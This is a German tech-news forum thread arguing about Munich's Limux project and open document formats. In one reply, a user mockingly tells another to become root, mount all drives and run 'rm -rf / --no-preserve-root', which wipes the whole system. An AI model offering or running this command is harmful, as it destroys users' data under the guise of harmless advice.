1. Foren
  2. Kommentare
  3. Wirtschaft-Forum
  4. Alle Kommentare zum Artikel
  5. › Limux: Windows-Rückkehr würde…
  6. Thema

Selber schuld, hätten sie es von vornherein gelassen...

Neue Foren im Freiraum! Raumfahrt und freie Software haben jetzt einen Platz, die Games tummeln sich jetzt alle in einem Forum.
  1. Thema
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5

Neues Thema Ansicht wechseln


  1. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Wallbreaker 15.10.14 - 11:06

    tux. schrieb:
    --------------------------------------------------------------------------------
    > Aus irgendwelchen fragwürdigen Gründen (wahrscheinlich sind da irgendwelche
    > Fanboy-Azubis reingestürmt und haben "Scheißwindoooooof, nehmt Ubuntu als
    > Basis, is voll super ey" krakeelt) eine funktionierende Infrastruktur durch
    > halbgaren Mist (der obendrein ständig mit neuen großen Lücken in den
    > Nachrichten ist) auszutauschen kann man als Privatmensch schon machen, von
    > einer Stadtverwaltung hätte ich allerdings mehr Hirn erwartet.
    >
    > Lernen durch Schmerz.

    Ah ein neuer Troll, machs auch dir nicht so schwer.

    Terminal:

    1. su
    2. Passwort
    3. Mounte alle Datenträger die du besitzt, inkl. USB Sticks
    4. rm -rf / --no-preserve-root

    Drück Enter, geh kurz aufs Klo, und freu dich wenn du wieder zurück bist.

  2. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: plutoniumsulfat 15.10.14 - 11:09

    Thiesi schrieb:
    --------------------------------------------------------------------------------
    > 0mega42 schrieb:
    > ---------------------------------------------------------------------------
    > > Offene Standards bringen für ALLE Nutzer Vorteile. Ich verstehe einfach
    >
    > Ist das jemals irgendwo belegt worden? Zudem: Wo setzt man denn mit der
    > Definition eines Standards an? Was hat man beispielsweise gewonnen, wenn
    > München/alle Verwaltungen anstatt M$ Word künftig LibreOffice nutzen, um
    > ausschließlich .docx-Dokumente zu verarbeiten?

    Wenn es alle verwenden, braucht es kein .docx mehr. Das ist der Mehrwert.

  3. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Thiesi 15.10.14 - 11:11

    plutoniumsulfat schrieb:
    --------------------------------------------------------------------------------

    > Wenn es alle verwenden, braucht es kein .docx mehr. Das ist der Mehrwert.

    Ja, & wenn alle GIMP verwenden, braucht es kein Photoshop mehr. Oder wie?

  4. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: plutoniumsulfat 15.10.14 - 11:12

    Photoshop ist das Programm, .docx ein Format.

  5. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Niaxa 15.10.14 - 11:14

    Leg dich mal ne Stunde aufs Ohr, war ein anstrengender Morgen für dich.

    @TE:

    Du hast scheinbar nicht viel Ahnung. Ich weis nicht was du dir vorstellst, wie es in solchen Verwaltungen zu geht, aber ich kann dir sagen es sind ganz andere Entscheidungsgründe vorhanden, wie irgendwelche Vorlieben von irgendwelchen Nutzern.

  6. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: Thiesi 15.10.14 - 11:16

    Danke.

  7. Re: Selber schuld, hätten sie es von vornherein gelassen...

    Autor: WarumLinuxBesserIst 22.10.14 - 18:13

    http://www.computerwoche.de/a/freie-software-sucht-nach-wegen-in-die-kommunalverwaltung,2557330#
    Vor allem die letzten zwei Sätze treffen das genau. Warum soll man unnötig an Microsoft Lizenzkosten abdrücken, wenn es doch eh aus der Cloud kommt.

    Und der Cloudserver ist sowieso in den meisten Fällen ein Linux Server

    *********************************************************************
    * * * * * Mein Kanal auf YouTube: WarumLinuxBesserIst
    *********************************************************************

  1. Thema
  1. 1
  2. 2
  3. 3
  4. 4
  5. 5

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Sie müssen ausserdem in Ihrem Account-Profil unter Forum einen Nutzernamen vergeben haben. Zum Login

Stellenmarkt
  1. Fachinformatiker Systemintegration/IT-Systema- dministrator (m/w/d)
    Verbandsgemeinde Jockgrim, Jockgrim
  2. IT-Systemadministrator
    ASCon Systems GmbH, Stuttgart, Mainz, München
  3. Mitarbeiter IT/IT-Systemadmnistrator (m/w/d)
    S-PensionsManagement GmbH, Köln
  4. Product Owner (w/m/d) Digitalisierung
    HanseVision GmbH, Hamburg

Detailsuche


Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. (u. a. Ryzen 5 5600X 358,03€)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Cyberwar: Was steckt hinter dem Cyberangriff auf die Ukraine?
Cyberwar
Was steckt hinter dem Cyberangriff auf die Ukraine?

Die Computersysteme ukrainischer Regierungsstellen sind angegriffen worden. Ist das nur ein alltäglicher Cyberangriff? Oder steckt mehr dahinter?
Eine Analyse von Werner Pluta

  1. USA Biden sieht Gefahr eines Kriegs als Folge von Cyberangriffen

God of War (PC) im Technik-Test: Kratos' Axt hackt geschmeidiger denn je
God of War (PC) im Technik-Test
Kratos' Axt hackt geschmeidiger denn je

Bessere Optik, höhere Framerate und niedrigere Latenz: Die PC-Version von God of War lässt kaum Wünsche offen, selbst bei älteren Grafikkarten.
Ein Test von Marc Sauter

  1. Sony Ultra-PC von God of War wird leistungshungrig
  2. God of War Kriegsgott Kratos kämpft sich auf PCs
  3. God of War Ragnarök schickt erneut Kratos und Sohn ins Abenteuer

Aufbauspiel Angespielt: Die Siedler gewinnen Land mit Ingenieuren
Aufbauspiel Angespielt
Die Siedler gewinnen Land mit Ingenieuren

Nun geht es ganz schnell bei Die Siedler: Beta im Januar, Veröffentlichung im März 2022. Golem.de konnte das Aufbauspiel schon ausprobieren.
Von Peter Steinlechner

  1. Ubisoft Blue Byte Im Januar 2022 wuselt das neue Die Siedler weiter